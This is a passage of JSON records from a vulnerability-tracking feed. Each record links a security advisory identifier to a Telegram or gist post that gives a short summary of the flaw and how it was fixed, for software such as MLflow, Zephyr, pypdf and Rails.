"2023-04-15T00:26:24.000000Z"}, {"uuid": "8cf5aab6-1afe-42b1-a1de-b6fb3943d758", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2X9C-QWGF-94XR", "type": "seen", "source": "https://t.me/cibsecurity/60969", "content": "\u203c CVE-2023-28103 \u203c\n\nmatrix-react-sdk is a Matrix chat protocol SDK for React Javascript. In certain configurations, data sent by remote servers containing special strings in key locations could cause modifications of the `Object.prototype`, disrupting matrix-react-sdk functionality, causing denial of service and potentially affecting program logic. This is fixed in matrix-react-sdk 3.69.0 and users are advised to upgrade. There are no known workarounds for this vulnerability. Note this advisory is distinct from GHSA-2x9c-qwgf-94xr which refers to a similar issue.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-03-29T00:46:15.000000Z"}, {"uuid": "029cd111-4144-446d-86a5-81375c030a6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4h98-2769-gh6h", "type": "seen", "source": "https://gist.github.com/Oblivionis214/9357d4d4e66bb50b3ab5e5f091a4bba7", "content": "", "creation_timestamp": "2026-04-30T11:51:12.000000Z"}, {"uuid": "78713d8a-a580-46af-aa5a-b298ac79914d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9PFH-R8X4-W26W", "type": "seen", "source": "https://t.me/cibsecurity/55253", "content": "\u203c CVE-2022-23547 \u203c\n\nPJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. This issue is similar to GHSA-9pfh-r8x4-w26w. Possible buffer overread when parsing a certain STUN message. The vulnerability affects applications that uses STUN including PJNATH and PJSUA-LIB. The patch is available as commit in the master branch.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-12-23T18:14:45.000000Z"}, {"uuid": "1e967815-af00-419d-854b-800d93290e4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6HV3-7C34-4HX8", "type": "seen", "source": "https://t.me/cibsecurity/55372", "content": "\u203c CVE-2019-14802 \u203c\n\nHashiCorp Nomad 0.5.0 through 0.9.4 (fixed in 0.9.5) reveals unintended environment variables to the rendering task during template rendering, aka GHSA-6hv3-7c34-4hx8. This applies to nomad/client/allocrunner/taskrunner/template.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-12-27T00:40:59.000000Z"}, {"uuid": "52596c13-365a-4d5b-a1c4-e3a095c08c16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:2117", "type": "seen", "source": "https://t.me/cibsecurity/49198", "content": "\u203c CVE-2022-2738 \u203c\n\nThe version of podman as released for Red Hat Enterprise Linux 7 Extras via RHSA-2022:2190 advisory included an incorrect version of podman missing the fix for CVE-2020-8945, which was previously fixed via RHSA-2020:2117. This issue could possibly be used to crash or cause potential code execution in Go applications that use the Go GPGME wrapper library, under certain conditions, during GPG signature verification.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-09-02T00:38:20.000000Z"}, {"uuid": "eb786eda-10e5-4648-8b54-25951093dc33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2022:2190", "type": "seen", "source": "https://t.me/cibsecurity/49198", "content": "\u203c CVE-2022-2738 \u203c\n\nThe version of podman as released for Red Hat Enterprise Linux 7 Extras via RHSA-2022:2190 advisory included an incorrect version of podman missing the fix for CVE-2020-8945, which was previously fixed via RHSA-2020:2117. This issue could possibly be used to crash or cause potential code execution in Go applications that use the Go GPGME wrapper library, under certain conditions, during GPG signature verification.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-09-02T00:38:20.000000Z"}, {"uuid": "b38da67f-af3d-4542-837c-407bb3a81fe1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G7CV-RXG3-HMPX", "type": "seen", "source": "https://t.me/bdufstecru/3161", "content": "", "creation_timestamp": "2026-05-15T12:57:17.000000Z"}, {"uuid": "74b230cd-f739-43f1-abb7-6aea263339b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WH98-P28R-VRC9", "type": "seen", "source": "https://t.me/cibsecurity/37362", "content": "\u203c CVE-2022-23633 \u203c\n\nAction Pack is a framework for handling and responding to web requests. Under certain circumstances response bodies will not be closed. In the event a response is *not* notified of a `close`, `ActionDispatch::Executor` will not know to reset thread local state for the next request. This can lead to data being leaked to subsequent requests.This has been fixed in Rails 7.0.2.1, 6.1.4.5, 6.0.4.5, and 5.2.6.1. Upgrading is highly recommended, but to work around this problem a middleware described in GHSA-wh98-p28r-vrc9 can be used.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-02-12T00:29:16.000000Z"}, {"uuid": "e16ab333-d16b-48d3-849b-014eb057ba53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3GJC-MP82-FJ4Q", "type": "seen", "source": "https://t.me/ctinow/159673", "content": "https://ift.tt/IGnAP3d\n[GHSA-3gjc-mp82-fj4q] TYPO3 Arbitrary File Read via Directory Traversal", "creation_timestamp": "2023-12-27T16:17:09.000000Z"}, {"uuid": "96fab2f7-2802-4413-806f-3c298c800894", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQXC-9P8H-XQGQ", "type": "seen", "source": "https://t.me/ctinow/159672", "content": "https://ift.tt/d2rVqXj\n[GHSA-rqxc-9p8h-xqgq] ActiveAdmin vulnerable to CSV injection", "creation_timestamp": "2023-12-27T16:17:08.000000Z"}, {"uuid": "bba17c77-1cdd-4fac-9da6-5e6ae44ad91b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MW99-9CHC-XW7R", "type": "seen", "source": "https://t.me/ctinow/159671", "content": "https://ift.tt/wVtH8rW\n[GHSA-mw99-9chc-xw7r] Maliciously crafted Git server replies can cause DoS on go-git clients", "creation_timestamp": "2023-12-27T16:17:07.000000Z"}, {"uuid": "1249d924-dbd3-4e41-857b-790b654149e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JPFP-XQ3P-4H3R", "type": "seen", "source": "https://t.me/ctinow/159670", "content": "https://ift.tt/Cc4pwJD\n[GHSA-jpfp-xq3p-4h3r] Deis Workflow Manager race condition vulnerability", "creation_timestamp": "2023-12-27T16:17:06.000000Z"}, {"uuid": "33e42992-5185-4570-9084-c78e8af42989", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W2RV-X3PP-H67Q", "type": "seen", "source": "https://t.me/ctinow/157738", "content": "https://ift.tt/5dxUygG\nCVE-2023-46326 | ZStack Cloud up to 3.10.38 API improper authentication (GHSA-w2rv-x3pp-h67q)", "creation_timestamp": "2023-12-21T15:11:39.000000Z"}, {"uuid": "895ea3c3-00e7-403c-b01b-d96cb412526c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WF2X-8W6J-QW37", "type": "seen", "source": "https://t.me/ctinow/163286", "content": "https://ift.tt/y1ajwNK\n[GHSA-wf2x-8w6j-qw37] view_component Cross-site Scripting vulnerability", "creation_timestamp": "2024-01-04T23:06:32.000000Z"}, {"uuid": "9865663b-b3e3-40d2-b860-631146ce18c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JF5R-WGF4-QHXF", "type": "seen", "source": "https://t.me/ctinow/158436", "content": "https://ift.tt/5WxAIfe\nCVE-2023-49287 | cxong TinyDir up to 1.2.5 tinydir_file_open buffer overflow (GHSA-jf5r-wgf4-qhxf)", "creation_timestamp": "2023-12-22T15:23:37.000000Z"}, {"uuid": "b7ea1314-bddf-4254-a4e0-1cb79f5e28fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-437M-7HJ5-9MPW", "type": "seen", "source": "https://t.me/ctinow/163596", "content": "https://ift.tt/Zg9eF24\n[GHSA-437m-7hj5-9mpw] Kruise allows leveraging the kruise-daemon pod to list all secrets in the entire cluster", "creation_timestamp": "2024-01-05T17:16:15.000000Z"}, {"uuid": "be625abb-0083-49a8-86b9-5d1f8e7d726c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4553-HQ82-8654", "type": "seen", "source": "https://t.me/ctinow/163584", "content": "https://ift.tt/GpqA9ZR\n[GHSA-4553-hq82-8654] Duplicate Advisory: encoded_id-rails potential DOS vulnerability due to URIs with extremely long encoded IDs", "creation_timestamp": "2024-01-05T16:36:44.000000Z"}, {"uuid": "97577941-b410-4290-9af4-7dd05a0bb970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QWF7-RV77-FCR3", "type": "seen", "source": "https://t.me/ctinow/163583", "content": "https://ift.tt/dr4C1Sm\n[GHSA-qwf7-rv77-fcr3] Duplicate Advisory: Malicious URL drafting attack against iodines static file server may allow path traversal", "creation_timestamp": "2024-01-05T16:36:43.000000Z"}, {"uuid": "29161637-d561-4fb8-a00d-6c18eaaf15ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V4V2-8H88-65QJ", "type": "seen", "source": "https://t.me/ctinow/158247", "content": "https://ift.tt/3SQJz6g\nCVE-2023-49276 | louislam uptime-kuma up to 1.23.6 cross site scripting (GHSA-v4v2-8h88-65qj)", "creation_timestamp": "2023-12-22T08:51:35.000000Z"}, {"uuid": "8460a409-06e6-40ae-be5f-e88111848af6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G2GP-X888-6XRJ", "type": "seen", "source": "https://t.me/ctinow/158236", "content": "https://ift.tt/meZKv7b\nCVE-2023-49281 | Cainor Calendarinho redirect (GHSA-g2gp-x888-6xrj)", "creation_timestamp": "2023-12-22T08:21:46.000000Z"}, {"uuid": "c7ccafe2-148e-4f71-8392-4c9f7798f155", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RFQ3-WPJH-PPVG", "type": "seen", "source": "https://t.me/ctinow/158647", "content": "https://ift.tt/bYkQdMz\n[GHSA-rfq3-wpjh-ppvg] WSO2 Registry Stored Cross Site Scripting (XSS) vulnerability", "creation_timestamp": "2023-12-22T22:42:47.000000Z"}, {"uuid": "f8cb2ea6-73d7-4610-a7b9-b5b097d144b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PRR3-C3M5-P7Q2", "type": "seen", "source": "https://t.me/ctinow/157759", "content": "https://ift.tt/MeloIEq\nCVE-2023-48631 | Adobe CSS-Tools prior 4.3.2 redos (GHSA-prr3-c3m5-p7q2)", "creation_timestamp": "2023-12-21T15:42:34.000000Z"}, {"uuid": "698e580d-2bc7-4da5-8a26-64916a408de2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-625G-FM5W-W7W4", "type": "seen", "source": "https://t.me/ctinow/163147", "content": "https://ift.tt/03X4NpR\n[GHSA-625g-fm5w-w7w4] Froxlor username/surname AND company field Bypass", "creation_timestamp": "2024-01-04T18:36:55.000000Z"}, {"uuid": "af5a29da-e805-4bff-addd-7e34336359a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MHPQ-9638-X6PW", "type": "seen", "source": "https://t.me/ctinow/157331", "content": "https://ift.tt/k7dGqcv\n[GHSA-mhpq-9638-x6pw] Denial of service when decrypting attack controlled input in github.com/dvsekhvalnov/jose2go", "creation_timestamp": "2023-12-20T21:46:54.000000Z"}, {"uuid": "cb1e8b51-bc3e-4091-8f42-f7e0721c384e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-83Q5-WHQP-R8JR", "type": "seen", "source": "https://t.me/ctinow/157330", "content": "https://ift.tt/k7N2uUe\n[GHSA-83q5-whqp-r8jr] Apache Pulsar WebSocket Proxy contains an Improper Authentication vulnerability", "creation_timestamp": "2023-12-20T21:46:52.000000Z"}, {"uuid": "65a45c67-0fbb-465c-8dbd-7897d993181c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59V3-898R-QWHJ", "type": "seen", "source": "https://t.me/ctinow/157329", "content": "https://ift.tt/aMuHfhw\n[GHSA-59v3-898r-qwhj] MLflow Server-Side Request Forgery (SSRF)", "creation_timestamp": "2023-12-20T21:46:51.000000Z"}, {"uuid": "dcc6060d-f0bc-423a-9279-286c8b4fa2a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5R3Q-93Q3-F978", "type": "seen", "source": "https://t.me/ctinow/157328", "content": "https://ift.tt/vXCxPqZ\n[GHSA-5r3q-93q3-f978] MLflow Path Traversal Vulnerability", "creation_timestamp": "2023-12-20T21:46:50.000000Z"}, {"uuid": "0b075d7f-35c5-45ef-bec2-1e2da6747832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HH8P-P8MP-GQHM", "type": "seen", "source": "https://t.me/ctinow/157327", "content": "https://ift.tt/y0RcXAz\n[GHSA-hh8p-p8mp-gqhm] MLFlow Path Traversal Vulnerability", "creation_timestamp": "2023-12-20T21:46:49.000000Z"}, {"uuid": "1df61457-f1a5-4741-ae92-64b0d4a2f07b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QG8P-32GR-GH6X", "type": "seen", "source": "https://t.me/ctinow/157326", "content": "https://ift.tt/RKFWByc\n[GHSA-qg8p-32gr-gh6x] MLflow Local File Disclosure Vulnerability", "creation_timestamp": "2023-12-20T21:46:48.000000Z"}, {"uuid": "175f2161-f688-4226-9093-9f4615921d82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WV8Q-4F85-2P8P", "type": "seen", "source": "https://t.me/ctinow/157325", "content": "https://ift.tt/F0RHtz9\n[GHSA-wv8q-4f85-2p8p] MLflow Path Traversal Vulnerability", "creation_timestamp": "2023-12-20T21:46:47.000000Z"}, {"uuid": "dcd7a390-31cd-455b-8fc4-a40092d5f3bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V68G-WM8C-6X7J", "type": "seen", "source": "https://t.me/ctinow/157321", "content": "https://ift.tt/GXEonWR\n[GHSA-v68g-wm8c-6x7j] transformers has a Deserialization of Untrusted Data vulnerability", "creation_timestamp": "2023-12-20T21:37:01.000000Z"}, {"uuid": "a3d8547f-e0a6-48a5-ada9-1d5ec9fe4eed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7823", "type": "seen", "source": "https://t.me/ctinow/163072", "content": "https://ift.tt/U95720L\nRHSA-2023:7823: Important: OpenShift Container Platform 4.12.46 bug fix and security update", "creation_timestamp": "2024-01-04T16:16:24.000000Z"}, {"uuid": "4235f934-592f-4f17-9fd3-3f9620cbd0f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7827", "type": "seen", "source": "https://t.me/ctinow/163071", "content": "https://ift.tt/eEUumg9\nRHSA-2023:7827: Important: OpenShift Container Platform 4.13.z security update", "creation_timestamp": "2024-01-04T16:16:22.000000Z"}, {"uuid": "e4c1659c-d243-4a92-b490-8d7471e81934", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HWCC-4CV8-CF3H", "type": "seen", "source": "https://t.me/ctinow/158609", "content": "https://ift.tt/oWgH2TQ\n[GHSA-hwcc-4cv8-cf3h] Snowflake Connector .NET does not properly check the Certificate Revocation List (CRL)", "creation_timestamp": "2023-12-22T21:02:53.000000Z"}, {"uuid": "eeac65a6-69f5-45c4-87d5-a820772ae782", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JCRR-RR6W-8C83", "type": "seen", "source": "https://t.me/ctinow/158608", "content": "https://ift.tt/JlkWwuA\n[GHSA-jcrr-rr6w-8c83] free5GC AMF denial of service vulnerability", "creation_timestamp": "2023-12-22T21:02:52.000000Z"}, {"uuid": "ed5ca7d3-0570-459a-b5bb-9f23763a7d6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HM9V-VJ3R-R55M", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/65818", "content": "\u203c CVE-2023-36807 \u203c\n\npypdf is a pure-python PDF library capable of splitting, merging, cropping, and transforming the pages of PDF files. In version 2.10.5 an attacker who uses this vulnerability can craft a PDF which leads to an infinite loop. This infinite loop blocks the current process and can utilize a single core of the CPU by 100%. It does not affect memory usage. That is, for example, the case if the user extracted metadata from such a malformed PDF. Versions prior to 2.10.5 throw an error, but do not hang forever. This issue was fixed with https://github.com/py-pdf/pypdf/pull/1331 which has been included in release 2.10.6. Users are advised to upgrade. Users unable to upgrade should modify `PyPDF2/generic/_data_structures.py::read_object` to an an error throwing case. See GHSA-hm9v-vj3r-r55m for details.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-06-30T22:15:17.000000Z"}, {"uuid": "9bdefc6a-bcc1-49ae-9018-8d8d7298de68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XHG3-GVJ6-4RQH", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/45337", "content": "\u203c CVE-2021-3435 \u203c\n\nInformation leakage in le_ecred_conn_req(). Zephyr versions &gt;= v2.4.0 Use of Uninitialized Resource (CWE-908). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-xhg3-gvj6-4rqh\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-29T00:36:27.000000Z"}, {"uuid": "e2f60022-597e-4102-9a3a-24ec4bac5a24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7548-5M6F-MQV9", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/45335", "content": "\u203c CVE-2021-3431 \u203c\n\nAssertion reachable with repeated LL_FEATURE_REQ. Zephyr versions &gt;= v2.5.0 contain Reachable Assertion (CWE-617). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-7548-5m6f-mqv9\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-29T00:36:25.000000Z"}, {"uuid": "c1f94ba9-b96a-45d8-9ad1-9c0c92cf3fc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7364-P4WC-8MJ4", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/45333", "content": "\u203c CVE-2021-3432 \u203c\n\nInvalid interval in CONNECT_IND leads to Division by Zero. Zephyr versions &gt;= v1.14.0 Divide By Zero (CWE-369). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-7364-p4wc-8mj4\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-29T00:36:23.000000Z"}, {"uuid": "70e2f3da-3ce2-4561-a065-dcda952269a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-46H3-HJCQ-2JJR", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/45332", "content": "\u203c CVE-2021-3430 \u203c\n\nAssertion reachable with repeated LL_CONNECTION_PARAM_REQ. Zephyr versions &gt;= v1.14 contain Reachable Assertion (CWE-617). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-46h3-hjcq-2jjr\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-29T00:36:22.000000Z"}, {"uuid": "6d1398b6-8fe6-481d-a57f-de9dc047789a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0130", "type": "seen", "source": "https://t.me/ctinow/165771", "content": "https://ift.tt/J2U9X3E\nRHSA-2024:0130: Moderate: frr security update", "creation_timestamp": "2024-01-10T13:16:40.000000Z"}, {"uuid": "19abc552-c417-4787-a1f4-cb94159e9b6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V799-2MP3-WGFR", "type": "seen", "source": "https://t.me/ctinow/165748", "content": "https://ift.tt/GFM0eLE\nCVE-2023-46727 | GLPI up to 10.0.10 sql injection (GHSA-v799-2mp3-wgfr)", "creation_timestamp": "2024-01-10T12:41:31.000000Z"}, {"uuid": "19893f0a-b6f3-47b4-bf65-7c100b4070eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0134", "type": "seen", "source": "https://t.me/ctinow/165734", "content": "https://ift.tt/aOFBkRS\nRHSA-2024:0134: Important: kernel-rt security update", "creation_timestamp": "2024-01-10T12:16:28.000000Z"}, {"uuid": "14c36bcd-59ae-4fbf-9abb-d5efba817385", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8G9C-28FC-MCX2", "type": "seen", "source": "https://t.me/ctinow/165274", "content": "https://ift.tt/dUzySga\n[GHSA-8g9c-28fc-mcx2] Microsoft Identity Denial of service vulnerability", "creation_timestamp": "2024-01-09T19:31:58.000000Z"}, {"uuid": "f91f55ba-5293-46d1-939e-e0558585f0f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J5HC-WX84-844H", "type": "seen", "source": "https://t.me/ctinow/165790", "content": "https://ift.tt/ptfRuwg\nCVE-2023-49296 | Arduino Create Agent up to 1.3.5 Web Interface /certificate.crt cross site scripting (GHSA-j5hc-wx84-844h)", "creation_timestamp": "2024-01-10T14:07:03.000000Z"}, {"uuid": "21c55a5f-0ca4-4c56-a5f2-3a46e3d4c1d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0106", "type": "seen", "source": "https://t.me/ctinow/165645", "content": "https://ift.tt/IKzcRH2\nRHSA-2024:0106: Moderate: nss security update", "creation_timestamp": "2024-01-10T09:16:51.000000Z"}, {"uuid": "db7e0195-f852-4465-849b-6ed9cd6ec4a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0107", "type": "seen", "source": "https://t.me/ctinow/165644", "content": "https://ift.tt/d3bSj7P\nRHSA-2024:0107: Moderate: nss security update", "creation_timestamp": "2024-01-10T09:16:50.000000Z"}, {"uuid": "86748d66-43ad-4d6a-96d5-806854701911", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7HPJ-7HHX-2FGX", "type": "seen", "source": "https://t.me/ctinow/160219", "content": "https://ift.tt/xl72Qpi\n[GHSA-7hpj-7hhx-2fgx] msgpackr's conversion of property names to strings can trigger infinite recursion", "creation_timestamp": "2023-12-28T22:26:15.000000Z"}, {"uuid": "01aac35b-b655-46e5-bc0e-9d3d7d8175e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0059", "type": "seen", "source": "https://t.me/ctinow/165492", "content": "https://ift.tt/vHWjnLV\nRHSA-2024:0059: Important: OpenShift Container Platform 4.11.56 bug fix and security update", "creation_timestamp": "2024-01-10T02:16:47.000000Z"}, {"uuid": "b6f06d27-79a0-4b02-a0c4-a1f8aac3a723", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7J9H-CH38-474R", "type": "seen", "source": "https://t.me/ctinow/160671", "content": "https://ift.tt/G3Eod2C\n[GHSA-7j9h-ch38-474r] Stored Cross-site scripting affecting automad/automad", "creation_timestamp": "2023-12-29T20:32:01.000000Z"}, {"uuid": "e75a3f88-0a02-4085-8374-56a2bd8e53f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8XM5-PGFR-8MJR", "type": "seen", "source": "https://t.me/ctinow/161138", "content": "https://ift.tt/kICHos5\nCVE-2023-49782 | CollaboraOnline prior 23.5.601 Built-in CODE Server App proxy.php cross site scripting (GHSA-8xm5-pgfr-8mjr)", "creation_timestamp": "2023-12-31T17:11:32.000000Z"}, {"uuid": "a9c9cbdd-952d-4bc6-b5db-002155c26031", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7M7H-RGVP-3V4R", "type": "seen", "source": "https://t.me/ctinow/160134", "content": "https://ift.tt/LZGXyOD\n[GHSA-7m7h-rgvp-3v4r] hutool-core discovered to contain an infinite loop in the StrSplitter.splitByRegex function", "creation_timestamp": "2023-12-28T17:56:36.000000Z"}, {"uuid": "8a585faf-28a8-47cc-bb6c-ad6ab66fbe9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H63J-XQX6-W58R", "type": "seen", "source": "https://t.me/ctinow/160133", "content": "https://ift.tt/9zaJdRw\n[GHSA-h63j-xqx6-w58r] mvel2 TimeOut error exists in the ParseTools.subCompileExpression method", "creation_timestamp": "2023-12-28T17:56:33.000000Z"}, {"uuid": "edee3edd-6ae6-4a25-809e-848cb4f6326c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 